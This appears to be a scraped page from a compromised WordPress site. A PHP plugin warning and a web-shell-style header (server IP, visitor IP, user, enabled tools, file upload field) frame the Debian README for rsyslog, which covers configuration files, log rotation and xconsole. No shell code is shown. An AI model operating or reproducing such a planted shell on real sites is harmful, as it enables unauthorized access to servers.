Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/doc/rsyslog/ |
Upload File : |
rsyslog for Debian ================== Configuration file(s) --------------------- The default configuration file for rsyslog is /etc/rsyslog.conf. Its format is based on the standard syslog.conf format. As rsyslog has a lot more advanced features than sysklogd, it extends this format with special configuration directives which all start with the '$' prefix. See the rsyslogd(8) and rsyslog.conf(5) man pages for further information or install the rsyslog-doc package which provides much more detailed documentation. The Debian default configuration for rsyslog uses: $IncludeConfig /etc/rsyslog.d/*.conf That means, all configuration files in /etc/rsyslog.d/ with a .conf file extension are read by rsyslog. This way the rsyslog configuration can be extended easily (either by package maintainers or local administrators). Log rotation ------------ Rsyslog uses the logrotate(8) utilitiy to rotate the standard Debian log files. The configuration file can be found at /etc/logrotate.d/rsyslog. The rotation cycle starts with .1, as this is the logrotate default. In contrast to sysklogd, which starts with .0. When upgrading from sysklogd, the postinst script will automatically rotate the existing standard Debian log files, if it is safe to do so (i.e. only if .0 is newer than .1). Logging to xconsole ------------------- The default rsyslog configuration no longer forwards any log messages to /dev/xconsole. It is simple to re-enable support for xconsole though. For that, the rsyslog package ships example files in /usr/share/doc/rsyslog/examples. To create the /dev/xconsole pipe, copy examples/tmpfiles.d/xconsole.conf to /etc/tmpfiles.d/ and then run "systemd-tmpfiles --create xconsole.conf". And finally copy examples/rsyslog.d/xconsole.conf to /etc/rsyslog.d/ and restart the rsyslog service.